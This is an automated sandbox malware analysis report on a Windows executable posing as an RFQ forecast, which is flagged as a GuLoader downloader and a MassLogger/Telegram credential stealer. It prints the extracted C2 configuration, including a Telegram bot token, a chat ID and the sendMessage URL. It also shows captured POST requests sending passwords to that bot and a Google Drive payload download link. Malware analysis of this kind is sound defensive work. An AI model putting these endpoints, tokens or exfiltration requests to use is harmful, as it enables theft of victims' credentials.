Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ December-January Forcast and TCL.exe

Overview

General Information

Sample name:RFQ December-January Forcast and TCL.exe
Analysis ID:1577232
MD5:65eea9949b624401ea78aaf28072ab3f
SHA1:fbbe105c42a0ad822625a5242d854357f956886c
SHA256:32fb0b39f4243593925572e1ea32d1bd21e72a8c0022a12c6c8025da20b7ffb2
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2057192020.000000000356F000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: RFQ December-January Forcast and TCL.exe PID: 2692JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T09:52:05.808790+010020577441Malware Command and Control Activity Detected192.168.2.449752149.154.167.220443TCP
            2024-12-18T09:52:09.325974+010020577441Malware Command and Control Activity Detected192.168.2.449758149.154.167.220443TCP
            2024-12-18T09:52:12.665699+010020577441Malware Command and Control Activity Detected192.168.2.449769149.154.167.220443TCP
            2024-12-18T09:52:16.296271+010020577441Malware Command and Control Activity Detected192.168.2.449777149.154.167.220443TCP
            2024-12-18T09:52:19.981105+010020577441Malware Command and Control Activity Detected192.168.2.449788149.154.167.220443TCP
            2024-12-18T09:52:23.826079+010020577441Malware Command and Control Activity Detected192.168.2.449800149.154.167.220443TCP
            2024-12-18T09:52:27.776272+010020577441Malware Command and Control Activity Detected192.168.2.449812149.154.167.220443TCP
            2024-12-18T09:52:31.173451+010020577441Malware Command and Control Activity Detected192.168.2.449819149.154.167.220443TCP
            2024-12-18T09:52:34.620820+010020577441Malware Command and Control Activity Detected192.168.2.449831149.154.167.220443TCP
            2024-12-18T09:52:38.101320+010020577441Malware Command and Control Activity Detected192.168.2.449843149.154.167.220443TCP
            2024-12-18T09:52:41.586605+010020577441Malware Command and Control Activity Detected192.168.2.449850149.154.167.220443TCP
            2024-12-18T09:52:44.961373+010020577441Malware Command and Control Activity Detected192.168.2.449862149.154.167.220443TCP
            2024-12-18T09:52:48.314478+010020577441Malware Command and Control Activity Detected192.168.2.449869149.154.167.220443TCP
            2024-12-18T09:52:51.698398+010020577441Malware Command and Control Activity Detected192.168.2.449881149.154.167.220443TCP
            2024-12-18T09:52:55.057064+010020577441Malware Command and Control Activity Detected192.168.2.449889149.154.167.220443TCP
            2024-12-18T09:52:59.049907+010020577441Malware Command and Control Activity Detected192.168.2.449900149.154.167.220443TCP
            2024-12-18T09:53:02.514487+010020577441Malware Command and Control Activity Detected192.168.2.449912149.154.167.220443TCP
            2024-12-18T09:53:06.047224+010020577441Malware Command and Control Activity Detected192.168.2.449920149.154.167.220443TCP
            2024-12-18T09:53:09.391789+010020577441Malware Command and Control Activity Detected192.168.2.449931149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T09:51:54.919930+010028032742Potentially Bad Traffic192.168.2.449738158.101.44.24280TCP
            2024-12-18T09:52:03.732495+010028032742Potentially Bad Traffic192.168.2.449738158.101.44.24280TCP
            2024-12-18T09:52:07.373361+010028032742Potentially Bad Traffic192.168.2.449757158.101.44.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T09:51:47.011616+010028032702Potentially Bad Traffic192.168.2.449736172.217.17.46443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
            Source: RFQ December-January Forcast and TCL.exe.2692.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
            Source: RFQ December-January Forcast and TCL.exeVirustotal: Detection: 29%Perma Link
            Source: RFQ December-January Forcast and TCL.exeReversingLabs: Detection: 18%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5D1EC CryptUnprotectData,4_2_36A5D1EC
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5D9D9 CryptUnprotectData,4_2_36A5D9D9
            Source: RFQ December-January Forcast and TCL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
            Source: RFQ December-January Forcast and TCL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A5C985h4_2_36A5C638
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A51042h4_2_36A50C28
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A50671h4_2_36A503AF
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A5E198h4_2_36A5DEE1
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A5EA48h4_2_36A5E790
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A51042h4_2_36A50F6F
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A5B791h4_2_36A5B4EC
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A51042h4_2_36A50C1A
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A5C041h4_2_36A5BD88
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A5DD40h4_2_36A5DA89
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A5EEA0h4_2_36A5EBF2
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A5E5F0h4_2_36A5E339
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A5B339h4_2_36A5B07F
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A5F2F8h4_2_36A5F042
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A5C499h4_2_36A5C1F2
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36A5BBE9h4_2_36A5B944
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B0882Dh4_2_36B08650
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B091B7h4_2_36B08650
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then push 00000000h4_2_36B0BDF0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B03968h4_2_36B036C0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B030B8h4_2_36B02E10
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B05908h4_2_36B05660
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B01250h4_2_36B00FA8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B06A68h4_2_36B067C0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B061B8h4_2_36B05F10
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B04218h4_2_36B03F70
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B01F58h4_2_36B01CB0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B07770h4_2_36B074C8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B06EC0h4_2_36B06C18
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B016A8h4_2_36B01400
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B05058h4_2_36B04DB0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B02808h4_2_36B02560
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B05D60h4_2_36B05AB8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B054B0h4_2_36B05208
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B03510h4_2_36B03268
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36B0CBE7
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B04670h4_2_36B043C8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B03DC0h4_2_36B03B18
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_36B08373
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B06610h4_2_36B06368
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_36B07B4F
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B04ACAh4_2_36B04820
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B07318h4_2_36B07070
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B01B00h4_2_36B01858
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B02C60h4_2_36B029B8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_36B08193
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then push 00000000h4_2_36B0C92F
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then jmp 36B023B0h4_2_36B02108
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then push 00000000h4_2_36B2E790
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_36B2F5A0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4x nop then push 00000000h4_2_36B2F2DE

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49831 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49812 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49819 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49752 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49850 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49777 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49869 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49800 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49788 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49920 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49769 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49843 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49912 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49758 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49900 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49862 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49889 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49931 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49881 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f1755089ed1Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f411f1efb9fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f66828e4af0Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f8bafdfa933Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1fb779480112Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1fdee6004ffaHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd200a1dff2dceHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd202fb14aa943Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2053b6e78698Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2078d8a23e11Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd209f10201f24Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd20c3bcaf4e02Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd20f002538289Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd211fe290318aHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd21520b83928eHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd219995a29a71Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd21e0a29bfee3Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2232a3b8a3f5Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd228073636e92Host: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49757 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.217.17.46:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1kBgXhcovDf8sC7oAs4bfda6EBKjidm_z HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1kBgXhcovDf8sC7oAs4bfda6EBKjidm_z&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
